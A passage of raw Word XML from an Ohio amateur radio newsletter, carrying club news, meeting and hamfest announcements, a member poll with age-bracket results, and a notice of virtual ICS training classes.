      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gehringer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, WB8ZZR; David Chesney, KE8GII and Mike Boyle, WF8B.  Congratulations to all. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6314472D" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BFB6FED" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With sadness we learn of the passing of Howard Falk, KE4NIU, of Hillsboro.  Howard had been a long-time member of the </w:t>
      </w:r>
      <w:r w:rsidRPr="0070271A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Highland ARA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> since moving to Highland County from the Florida Panhandle.  Private services have been held.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1801A420" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12022EFA" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="009A7CDC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Hocking Valley ARA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will meet on January 4 at the Logan Chamber of Commerce Office, 96 West Hunter Street in Logan.  The meeting begins at 7 PM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D0EE01" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02479D9E" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Historically the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D05C2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Sunday Creek ARF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’s popular hamfest kicks off the ham radio hamfest year in Ohio.  Because of COVID, last year’s event was cancelled.  But this year it will return, but at a new location.  This coming year </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>the January 16 event will be moving to the Community Center in Shade, Ohio.  As details are evolving, watch the OSJ and this column for informational updates as we get closer to the date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1076769D" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BB13211" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">According to Ted Jacobson, W8KVK, Santa left ham licenses under the tree for two Lawrence County residents.  Proctorville’s Seth </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Crager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is now KE8TPD and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cris</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Chaney from Kitts Hill is KE8TPE.  Congrats and WELCOME.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DA762A" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22F407BF" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From 10 AM until 4 PM on Saturday, January 8, 2022 the Ohio UHF/VHF Simplex Test/Contest will occur.  This is a good time to check out exactly what your radio and antenna system will do and its range on the simplex frequencies should local repeaters fail.  Details and rules are available at </w:t>
      </w:r>
      <w:hyperlink r:id="rId184" w:history="1">
        <w:r w:rsidRPr="000A4217">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ohsimplex.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D9DFBD" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F6915B9" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The next meeting of the </w:t>
      </w:r>
      <w:r w:rsidRPr="003F66A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cambridge ARA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will be on January 29.  Nominations for the 2022 officers will take place during that meeting with the actual election held on February 26. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D733FA9" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="395E0E23" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>As we look out the window we see an old long bearded man in a robe slowly walking into the sunset.  And at the same time we hear the cries of what sounds like a newborn whose cries are getting louder with each passing moment as the sun breaks on a new day.  As 2021 fades, here’s hoping the remaining hours are good ones and the outlook for 2022 is promising.  My personal ham radio resolution is to finally be able to attend some hamfests this year, spend some more time on the HF bands and meet more South 40 readers and contributors.  In the meantime, N8ZNR and I wish each of you the best wishes for a safe and Happy New Year.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68512316" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BBC030C" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>John Levo, W8KIW, jlevo@cinci.rr.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2905510F" w14:textId="4C036924" w:rsidR="0001665F" w:rsidRDefault="0001665F" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39E568DD" w14:textId="30F4B782" w:rsidR="0001665F" w:rsidRDefault="0001665F" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3730CC2C" w14:textId="77777777" w:rsidR="0001665F" w:rsidRDefault="0001665F" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D812A50" w14:textId="77777777" w:rsidR="00EA3F06" w:rsidRDefault="00EA3F06" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F595A53" w14:textId="77777777" w:rsidR="00EA3F06" w:rsidRPr="00EA3F06" w:rsidRDefault="00EA3F06" w:rsidP="00EA3F06">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="one"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidRPr="00EA3F06">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252941312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="36724DA5" wp14:editId="5A198031">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>5343525</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>17780</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1487805" cy="1450975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21269"/>
                <wp:lineTo x="21296" y="21269"/>
                <wp:lineTo x="21296" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="87" name="Picture 87"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A picture containing clipart&#10;&#10;Description automatically generated"/>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1487805" cy="1450975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00EA3F06">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>One Question Questionnaire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EADE9E" w14:textId="77777777" w:rsidR="00EA3F06" w:rsidRPr="00EA3F06" w:rsidRDefault="00EA3F06" w:rsidP="00EA3F06">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A6B43A4" w14:textId="77777777" w:rsidR="00EA3F06" w:rsidRPr="00EA3F06" w:rsidRDefault="00EA3F06" w:rsidP="00EA3F06">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F12F380" w14:textId="0BA336C8" w:rsidR="0011249F" w:rsidRPr="0011249F" w:rsidRDefault="0011249F" w:rsidP="0011249F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011249F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">How about going to  </w:t>
      </w:r>
      <w:hyperlink r:id="rId186" w:history="1">
        <w:r w:rsidRPr="0011249F">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:bCs/>
            <w:color w:val="0563C1" w:themeColor="hyperlink"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://arrl-ohio.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0011249F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and giving me a click?  (It’s in the bottom left corner of the page) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322787D2" w14:textId="77777777" w:rsidR="00EA3F06" w:rsidRPr="00EA3F06" w:rsidRDefault="00EA3F06" w:rsidP="00EA3F06">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31924634" w14:textId="4EE7FBE4" w:rsidR="00EA3F06" w:rsidRPr="00CA72AB" w:rsidRDefault="00EA3F06" w:rsidP="00EA3F06">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Hlk80523594"/>
      <w:r w:rsidRPr="00EA3F06">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00AA204C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Have you been a Net Control Operator for a net at least once in the past 90 days?”</w:t>
      </w:r>
      <w:r w:rsidR="00CA72AB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidR="00CA72AB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a Yes / No question for the survey, but if you say yes, how about writing a couple sentences about </w:t>
      </w:r>
      <w:r w:rsidR="00AA204C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">why it’s important to operate as NCS at least once in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AA204C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>awhile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AA204C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="34"/>
    <w:p w14:paraId="539BF43C" w14:textId="77777777" w:rsidR="00EA3F06" w:rsidRPr="00EA3F06" w:rsidRDefault="00EA3F06" w:rsidP="00EA3F06">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20F5763E" w14:textId="77777777" w:rsidR="00EA3F06" w:rsidRPr="00EA3F06" w:rsidRDefault="00EA3F06" w:rsidP="00EA3F06">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03C5F734" w14:textId="00E41B96" w:rsidR="00EA3F06" w:rsidRDefault="00EA3F06" w:rsidP="00EA3F06">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3F06">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">From the last Poll:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A61ED5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="001033FE">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:caps/>
        </w:rPr>
        <w:t>What is your age bracket</w:t>
      </w:r>
      <w:r w:rsidR="00AA204C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:caps/>
        </w:rPr>
        <w:t>?”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A030AAE" w14:textId="77777777" w:rsidR="00AA204C" w:rsidRPr="00A61ED5" w:rsidRDefault="00AA204C" w:rsidP="00EA3F06">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17B76CE3" w14:textId="21493350" w:rsidR="00E12847" w:rsidRPr="00AA204C" w:rsidRDefault="00AA204C" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">More response than usual, but the result was what would be </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA204C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>expected.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  87 votes.  NONE in the 0-29 age bracket.  </w:t>
      </w:r>
      <w:r w:rsidR="00362A4A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>44 in the 30 – 69 age bracket and 43 in the 70+ age bracket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A2EFC3" w14:textId="6DD4B0A1" w:rsidR="00E12847" w:rsidRDefault="00E12847" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599B40CF" w14:textId="77777777" w:rsidR="00362A4A" w:rsidRDefault="00362A4A" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38851A0D" w14:textId="77777777" w:rsidR="00362A4A" w:rsidRDefault="00362A4A" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C8FEBA" w14:textId="34122E40" w:rsidR="00BE7112" w:rsidRPr="00BE7112" w:rsidRDefault="00BE7112" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Upcoming NIMS Training Opportunities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE0DCB7" w14:textId="5052C62F" w:rsidR="00BE7112" w:rsidRPr="00BE7112" w:rsidRDefault="00BE7112" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13804CB3" w14:textId="77777777" w:rsidR="00BE7112" w:rsidRPr="00BE7112" w:rsidRDefault="00BE7112" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Need to get those really hard to get ICS 300 and 400 classes to get to Level 3?  They are now being offered with very limited virtual seating. Yes, these classes are being offered virtually now along with a lot of other classes that used to require in-class sessions. Want to see what and where these classes are being offered?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0B1804" w14:textId="77777777" w:rsidR="00BE7112" w:rsidRPr="00BE7112" w:rsidRDefault="00BE7112" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10A512A5" w14:textId="77777777" w:rsidR="00BE7112" w:rsidRPr="00BE7112" w:rsidRDefault="0084211F" w:rsidP="00C006F5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId187" w:history="1">
        <w:r w:rsidR="00BE7112" w:rsidRPr="00BE7112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>&gt;&gt; Click Here &lt;&lt;</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="57812560" w14:textId="77777777" w:rsidR="0033065B" w:rsidRDefault="0033065B" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EBB9C2E" w14:textId="77777777" w:rsidR="005D5A5F" w:rsidRDefault="005D5A5F" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C3CB872" w14:textId="77777777" w:rsidR="005D5A5F" w:rsidRDefault="005D5A5F" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D5C8124" w14:textId="77777777" w:rsidR="005D5A5F" w:rsidRDefault="005D5A5F" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63F0D3BB" w14:textId="1317995E" w:rsidR="00BE7112" w:rsidRPr="00BE7112" w:rsidRDefault="0084211F" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:pict w14:anchorId="5EA0A426">
          <v:rect id="_x0000_i1090" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F7995B" w14:textId="5BA42A22" w:rsidR="00BE7112" w:rsidRPr="00BE7112" w:rsidRDefault="00BE7112" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Print an Official or Unofficial Copy of Your Amateur Radio License</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC30B87" w14:textId="2605735A" w:rsidR="00BE7112" w:rsidRPr="00BE7112" w:rsidRDefault="00615E39" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252681216" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="375EB6FB" wp14:editId="1DF901DD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>5052695</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>10795</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1792605" cy="2390775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21514"/>
                <wp:lineTo x="21348" y="21514"/>
                <wp:lineTo x="21348"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extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1792605" cy="2390775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00BE7112" w:rsidRPr="00BE7112">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
